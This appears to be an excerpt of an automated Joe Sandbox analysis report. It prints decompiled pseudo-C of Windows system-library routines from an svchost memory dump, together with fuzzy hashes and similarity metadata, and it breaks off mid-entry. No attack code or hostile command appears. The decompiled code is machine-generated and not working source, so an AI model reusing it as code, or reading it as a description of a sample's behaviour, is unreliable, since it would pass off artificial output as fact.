                                          				void* _t22;
                                          				char _t23;
                                          				void* _t36;
                                          				intOrPtr _t42;
                                          				intOrPtr _t43;
                                          
                                          				_v12 = __ecx;
                                          				_t43 = 0;
                                          				_v20 = __edx;
                                          				_t42 =  *__edx;
                                          				 *__edx = 0;
                                          				_v16 = _t42;
                                          				_push( &_v8);
                                          				_push(0);
                                          				_push(0);
                                          				_push(6);
                                          				_push(0);
                                          				_push(__ecx);
                                          				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                          				_push(_t36);
                                          				_t22 = E03A4F460();
                                          				if(_t22 < 0) {
                                          					if(_t22 == 0xc0000023) {
                                          						goto L1;
                                          					}
                                          					L3:
                                          					return _t43;
                                          				}
                                          				L1:
                                          				_t23 = _v8;
                                          				if(_t23 != 0) {
                                          					_t38 = _a4;
                                          					if(_t23 >  *_a4) {
                                          						_t42 = L03A44620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                          						if(_t42 == 0) {
                                          							goto L3;
                                          						}
                                          						_t23 = _v8;
                                          					}
                                          					_push( &_v8);
                                          					_push(_t23);
                                          					_push(_t42);
                                          					_push(6);
                                          					_push(_t43);
                                          					_push(_v12);
                                          					_push(_t36);
                                          					if(E03A4F460() < 0) {
                                          						if(_t42 != 0 && _t42 != _v16) {
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                          						}
                                          						goto L3;
                                          					}
                                          					 *_v20 = _t42;
                                          					 *_a4 = _v8;
                                          				}
                                          				_t43 = 1;
                                          				goto L3;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction ID: f6afec3436b3c98118512710156066284f234cf34776ce21b14194147e205a78
                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction Fuzzy Hash: 41218D36A40218AFDB21CF99CD80FBAFBB9EF85640F15405AFD019B210D634AE01C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E03A40050(void* __ecx) {
                                          				signed int _v8;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr* _t30;
                                          				intOrPtr* _t31;
                                          				signed int _t34;
                                          				void* _t40;
                                          				void* _t41;
                                          				signed int _t44;
                                          				intOrPtr _t47;
                                          				signed int _t58;
                                          				void* _t59;
                                          				void* _t61;
                                          				void* _t62;
                                          				signed int _t64;
                                          
                                          				_push(__ecx);
                                          				_v8 =  *0x3b1d360 ^ _t64;
                                          				_t61 = __ecx;
                                          				_t2 = _t61 + 0x20; // 0x20
                                          				E03A59ED0(_t2, 1, 0);
                                          				_t52 =  *(_t61 + 0x8c);
                                          				_t4 = _t61 + 0x8c; // 0x8c
                                          				_t40 = _t4;
                                          				do {
                                          					_t44 = _t52;
                                          					_t58 = _t52 & 0x00000001;
                                          					_t24 = _t44;
                                          					asm("lock cmpxchg [ebx], edx");
                                          					_t52 = _t44;
                                          				} while (_t52 != _t44);
                                          				if(_t58 == 0) {
                                          					L7:
                                          					_pop(_t59);
                                          					_pop(_t62);
                                          					_pop(_t41);
                                          					return E03A6B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                          				}
                                          				asm("lock xadd [esi], eax");
                                          				_t47 =  *[fs:0x18];
                                          				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                          				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                          				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                          				if(_t30 != 0) {
                                          					if( *_t30 == 0) {
                                          						goto L4;
                                          					}
                                          					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          					L5:
                                          					if( *_t31 != 0) {
                                          						_t18 = _t61 + 0x78; // 0x78
                                          						E03AF8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                          					}
                                          					_t52 =  *(_t61 + 0x5c);
                                          					_t11 = _t61 + 0x78; // 0x78
                                          					_t34 = E03A59702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                          					_t24 = _t34 | 0xffffffff;
                                          					asm("lock xadd [esi], eax");
                                          					if((_t34 | 0xffffffff) == 0) {
                                          						 *0x3b1b1e0(_t61);
                                          						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                          					}
                                          					goto L7;
                                          				}
                                          				L4:
                                          				_t31 = 0x7ffe0386;
                                          				goto L5;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f40e0cd403a486f47e203455b6f723e41b49366c5337ab973699dd316dee3d3
                                          • Instruction ID: e635b0798a32b86baea46d116feefee792fd9b3103234c37ac8f615871a96a7a
                                          • Opcode Fuzzy Hash: 0f40e0cd403a486f47e203455b6f723e41b49366c5337ab973699dd316dee3d3
                                          • Instruction Fuzzy Hash: 89318C35201B04CFD722DB28C940B96F3F5FF88714F18456EE99A8BB90EB75A801DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E03AA6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                          				signed short* _v8;
                                          				signed char _v12;
                                          				void* _t22;
                                          				signed char* _t23;
                                          				intOrPtr _t24;
                                          				signed short* _t44;
                                          				void* _t47;
                                          				signed char* _t56;
                                          				signed char* _t58;
                                          
                                          				_t48 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t44 = __ecx;
                                          				_v12 = __edx;
                                          				_v8 = __ecx;
                                          				_t22 = E03A47D50();
                                          				_t58 = 0x7ffe0384;
                                          				if(_t22 == 0) {
                                          					_t23 = 0x7ffe0384;
                                          				} else {
                                          					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          				}
                                          				if( *_t23 != 0) {
                                          					_t24 =  *0x3b17b9c; // 0x0
                                          					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                          					_t23 = L03A44620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                          					_t56 = _t23;
                                          					if(_t56 != 0) {
                                          						_t56[0x24] = _a4;
                                          						_t56[0x28] = _a8;
                                          						_t56[6] = 0x1420;
                                          						_t56[0x20] = _v12;
                                          						_t14 =  &(_t56[0x2c]); // 0x2c
                                          						E03A6F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                          						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                          						if(E03A47D50() != 0) {
                                          							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          						}
                                          						_push(_t56);
                                          						_push(_t47 - 0x20);
                                          						_push(0x402);
                                          						_push( *_t58 & 0x000000ff);
                                          						E03A69AE0();
                                          						_t23 = L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                          					}
                                          				}
                                          				return _t23;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45772f10c2dbbbe51d26577e7c31d5650f463820717785c24d140f7061f1ec67
                                          • Instruction ID: c5ffb175fe83e5f388b4d9fc224b651dfb65e88d17acdc47a56e13bba069f1f7
                                          • Opcode Fuzzy Hash: 45772f10c2dbbbe51d26577e7c31d5650f463820717785c24d140f7061f1ec67
                                          • Instruction Fuzzy Hash: 14217C76600A44AFC715DF68D944E6AB7B8FF48740F18016AF904DB7A1D735E910CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E03A690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                          				intOrPtr* _v0;
                                          				void* _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _v36;
                                          				void* _t38;
                                          				intOrPtr _t41;
                                          				void* _t44;
                                          				signed int _t45;
                                          				intOrPtr* _t49;
                                          				signed int _t57;
                                          				signed int _t58;
                                          				intOrPtr* _t59;
                                          				void* _t62;
                                          				void* _t63;
                                          				void* _t65;
                                          				void* _t66;
                                          				signed int _t69;
                                          				intOrPtr* _t70;
                                          				void* _t71;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t73;
                                          				char _t74;
                                          
                                          				_t65 = __edx;
                                          				_t57 = _a4;
                                          				_t32 = __ecx;
                                          				_v8 = __edx;
                                          				_t3 = _t32 + 0x14c; // 0x14c
                                          				_t70 = _t3;
                                          				_v16 = __ecx;
                                          				_t72 =  *_t70;
                                          				while(_t72 != _t70) {
                                          					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                          						L24:
                                          						_t72 =  *_t72;
                                          						continue;
                                          					}
                                          					_t30 = _t72 + 0x10; // 0x10
                                          					if(E03A7D4F0(_t30, _t65, _t57) == _t57) {
                                          						return 0xb7;
                                          					}
                                          					_t65 = _v8;
                                          					goto L24;
                                          				}
                                          				_t61 = _t57;
                                          				_push( &_v12);
                                          				_t66 = 0x10;
                                          				if(E03A5E5E0(_t57, _t66) < 0) {
                                          					return 0x216;
                                          				}
                                          				_t73 = L03A44620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                          				if(_t73 == 0) {
                                          					_t38 = 0xe;
                                          					return _t38;
                                          				}
                                          				_t9 = _t73 + 0x10; // 0x10
                                          				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                          				E03A6F3E0(_t9, _v8, _t57);
                                          				_t41 =  *_t70;
                                          				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                          					_t62 = 3;
                                          					asm("int 0x29");
                                          					_push(_t62);
                                          					_push(_t57);
                                          					_push(_t73);
                                          					_push(_t70);
                                          					_t71 = _t62;
                                          					_t74 = 0;
                                          					_v36 = 0;
                                          					_t63 = E03A5A2F0(_t62, _t71, 1, 6,  &_v36);
                                          					if(_t63 == 0) {
                                          						L20:
                                          						_t44 = 0x57;
                                          						return _t44;
                                          					}
                                          					_t45 = _v12;
                                          					_t58 = 0x1c;
                                          					if(_t45 < _t58) {
                                          						goto L20;
                                          					}
                                          					_t69 = _t45 / _t58;
                                          					if(_t69 == 0) {
                                          						L19:
                                          						return 0xe8;
                                          					}
                                          					_t59 = _v0;
                                          					do {
                                          						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                          							goto L18;
                                          						}
                                          						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                          						 *_t59 = _t49;
                                          						if( *_t49 != 0x53445352) {
                                          							goto L18;
                                          						}
                                          						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                          						return 0;
                                          						L18:
                                          						_t63 = _t63 + 0x1c;
                                          						_t74 = _t74 + 1;
                                          					} while (_t74 < _t69);
                                          					goto L19;
                                          				}
                                          				 *_t73 = _t41;
                                          				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                          				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                          				 *_t70 = _t73;
                                          				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                          				return 0;
                                          			}



























                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction ID: 517bd435a0f2bc7951a5b7bb08b5bf97e0e35c0ddff51205ec9b4b5fc00afd88
                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction Fuzzy Hash: 6B214CB6A00704EFDB20DF59C944EAAF7F8EB54750F1588AFE949AB250D730A9408B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E03A53B7A(void* __ecx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				intOrPtr _v20;
                                          				intOrPtr _t17;
                                          				intOrPtr _t26;
                                          				void* _t35;
                                          				void* _t38;
                                          				void* _t41;
                                          				intOrPtr _t44;
                                          
                                          				_t17 =  *0x3b184c4; // 0x0
                                          				_v12 = 1;
                                          				_v8 =  *0x3b184c0 * 0x4c;
                                          				_t41 = __ecx;
                                          				_t35 = L03A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x3b184c0 * 0x4c);
                                          				if(_t35 == 0) {
                                          					_t44 = 0xc0000017;
                                          				} else {
                                          					_push( &_v8);
                                          					_push(_v8);
                                          					_push(_t35);
                                          					_push(4);
                                          					_push( &_v12);
                                          					_push(0x6b);
                                          					_t44 = E03A6AA90();
                                          					_v20 = _t44;
                                          					if(_t44 >= 0) {
                                          						E03A6FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x3b184c0 * 0xc);
                                          						_t38 = _t35;
                                          						if(_t35 < _v8 + _t35) {
                                          							do {
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                          							} while (_t38 < _v8 + _t35);
                                          							_t44 = _v20;
                                          						}
                                          					}
                                          					_t26 =  *0x3b184c4; // 0x0
                                          					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                          				}
                                          				return _t44;
                                          			}













                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea94589e9dd86c3f0486c444b687a5bf37fc9ed162ff88c7114296f6207b1c31
                                          • Instruction ID: ce921a9903c2a39ebbfa7e2d84aeccee8810b9fce554126c5c8b2c58deefe748
                                          • Opcode Fuzzy Hash: ea94589e9dd86c3f0486c444b687a5bf37fc9ed162ff88c7114296f6207b1c31
                                          • Instruction Fuzzy Hash: 8C219F72A00208AFCB04DF58DE81B5AB7BDFF84748F1500AAEA08EB251D771ED05DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 789e905422faac0ae6d47f401c84c90d56a6c4b5c985faa8a655d63a2b2293b6
                                          • Instruction ID: 8ca769b6d281f7f0e19aaabaaade96d26e01b7eba9b7b06638420997aaebbfe6
                                          • Opcode Fuzzy Hash: 789e905422faac0ae6d47f401c84c90d56a6c4b5c985faa8a655d63a2b2293b6
                                          • Instruction Fuzzy Hash: 0D215936140740DFC721EF68CB40F1ABBB9BF08704F44456EE11A8BAA2CB35E951DB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction ID: 1944399cbfac4bff0bf9595110ef9f64aa1308d260398e7c00e0cc50e8b772dd
                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction Fuzzy Hash: 10018076140605BFD721EF65CE94EA3F77DFB543A0F04452BF21446661CB32ACA1CAA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1684ac32d73f75facb10213ab6b0fc1125ded11f591214bffb8dcf235c004372
                                          • Instruction ID: f7c490e49f7b157185244867bc0987d3ddf16ccdf579229d2bd644239e7ad762
                                          • Opcode Fuzzy Hash: 1684ac32d73f75facb10213ab6b0fc1125ded11f591214bffb8dcf235c004372
                                          • Instruction Fuzzy Hash: 1F0184766016497FC211EB69CE80E17B7ACFB89750B00062AF608CBB21CB24EC11C6E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 846b7fc6741abc113442b5e386285ed25221b12917f429efa4c82d980d605958
                                          • Instruction ID: 5e2a039d93b1aed925d188215a90e3d8639151f0be628c9bc7b2591731720b73
                                          • Opcode Fuzzy Hash: 846b7fc6741abc113442b5e386285ed25221b12917f429efa4c82d980d605958
                                          • Instruction Fuzzy Hash: 9C015275A00358AFCB14DFA9D941EAEB7B8EF44710F40405BB914EB380DA749A01CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40548712d9dd77a49cc058bda1191313d14d8cb5eb109ad25e3432b1a466f978
                                          • Instruction ID: 1a920fb1963ab23582d3ba615168ebba283cbfd0b99fb534e4f6fe3b0f10f63d
                                          • Opcode Fuzzy Hash: 40548712d9dd77a49cc058bda1191313d14d8cb5eb109ad25e3432b1a466f978
                                          • Instruction Fuzzy Hash: F9019E75A00358AFCB00EFA9D941EAEBBB8EF44700F40406BF914EB380DA75DA00CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: faf53612682554596f9089b1a97eb854c4b0d08101399a0a5da532328b4deecb
                                          • Instruction ID: 6dc96b07bd6d06f9aec28607053fa963de2182ef74a982829fd4d1baa14029e9
                                          • Opcode Fuzzy Hash: faf53612682554596f9089b1a97eb854c4b0d08101399a0a5da532328b4deecb
                                          • Instruction Fuzzy Hash: 8F014876E006189BC714EB6EDD049AFF7B9FB85120B95406F98069B744DF31DE05C650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction ID: 9bf863ecfc641dbecaffbc0bc71aea1fed1691a14ed5fc00c59a93dfb4dfd88c
                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction Fuzzy Hash: 5E018F32208A809FD322DB5DC988FA6B7EDEB86750F0D00B7F919CBA51D729DC40C620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b134db5229fff2e1d293f7066b9192f1e9159d1626e1e5c73fea9e022ba9aceb
                                          • Instruction ID: 7f2da58fa81fed8e419c08fb5a90835502bb181306841ce258e4a54966ddaada
                                          • Opcode Fuzzy Hash: b134db5229fff2e1d293f7066b9192f1e9159d1626e1e5c73fea9e022ba9aceb
                                          • Instruction Fuzzy Hash: AF012476504781DFC710EFA9CA40B1BB7E5AB84214F088A2AF98687790EE35D840CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7de130efa67423980a0242c3d2921c0acb114cef4aece91b79420dd0159ca3bb
                                          • Instruction ID: d9bb6848b4e0b9e099a5c6d6002ea7e6ec5fef40327501e37fb21665bc7e8ab6
                                          • Opcode Fuzzy Hash: 7de130efa67423980a0242c3d2921c0acb114cef4aece91b79420dd0159ca3bb
                                          • Instruction Fuzzy Hash: D8017175A00218AFCB14DBA9D945AAFB7B8EB44700F40406AB901AB380EA749A01C794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9eeba92c67261166ad862717debf79ff197663624c3b6c34b268df55f8f82db3
                                          • Instruction ID: 8a7a87e4a7bdc3ef2ef77f14fac6caaa563f35ab78aefa181bcb773d4d0ddd08
                                          • Opcode Fuzzy Hash: 9eeba92c67261166ad862717debf79ff197663624c3b6c34b268df55f8f82db3
                                          • Instruction Fuzzy Hash: 2A017175A00358AFCB14DFA9D945EAFB7B8EF44700F00406AB901AB381DA749A01C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00733c36a0f7df0dc22d32fac70d6b86234672652a5cdb31bab73e8a4dbb58f4
                                          • Instruction ID: 855b629e6ec46e5dcc11c80ed6beee7d441b5c94d8de6f1f7c7da7c679b832de
                                          • Opcode Fuzzy Hash: 00733c36a0f7df0dc22d32fac70d6b86234672652a5cdb31bab73e8a4dbb58f4
                                          • Instruction Fuzzy Hash: DE011E75A002189FCB00DFA9D9419AEB7B8EF48310F50415AF904EB341D634AA018BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1542e09b88e728a7006bcf58fc82cdd7fc504a013ad501b8adc7cbec77b37309
                                          • Instruction ID: 8959853d7a24284efbf9cd552f9adeae70dd48627c9f1e753e25bb5245b5cbd6
                                          • Opcode Fuzzy Hash: 1542e09b88e728a7006bcf58fc82cdd7fc504a013ad501b8adc7cbec77b37309
                                          • Instruction Fuzzy Hash: 6711DE74A102599FDB04DFA9D541BAEF7F4FF08700F1482AAE519EB781E6349A41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction ID: c5c32509cd687e0f3786b9d19eacdc019a85495ae1c94c54047aa01216880d55
                                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction Fuzzy Hash: D0F0FC372056329BD332EB5D89A0F67FEA59FC2A60F19043BF5159F345CA608C0287D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction ID: c0c5ebe28655526f202d7808960754344398f43a42e78c9cb7f027c1091a1a54
                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction Fuzzy Hash: 9401AD322006909BD326E75EC904BAABBA8EF95750F0D04A7E9148F6A1E679C8008764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 321f9e1b63d55a6f17178d4e0399925226df2deaa219dddb437237b07ee93bd3
                                          • Instruction ID: 265fe42bd1a12001f0a4032d3714da203b46e0b95c969033d4388c7afa98ff18
                                          • Opcode Fuzzy Hash: 321f9e1b63d55a6f17178d4e0399925226df2deaa219dddb437237b07ee93bd3
                                          • Instruction Fuzzy Hash: 6E016274A00308AFCB14DFA8D941AAEB7F4EF04704F14415AA514DF382DA35DA01CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d253032762063b541a3e58095cb2f83e907a9e1509a8ae0e8b0e2e11f615f14d
                                          • Instruction ID: 94584b2f957247120d0e5518dd50d9b1b86ec683c57863b13b5224060bc3a965
                                          • Opcode Fuzzy Hash: d253032762063b541a3e58095cb2f83e907a9e1509a8ae0e8b0e2e11f615f14d
                                          • Instruction Fuzzy Hash: F6013C75A01258AFCB44EFA9D645AAEB7F4FF48700F50805AB815EB381EA349A00CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
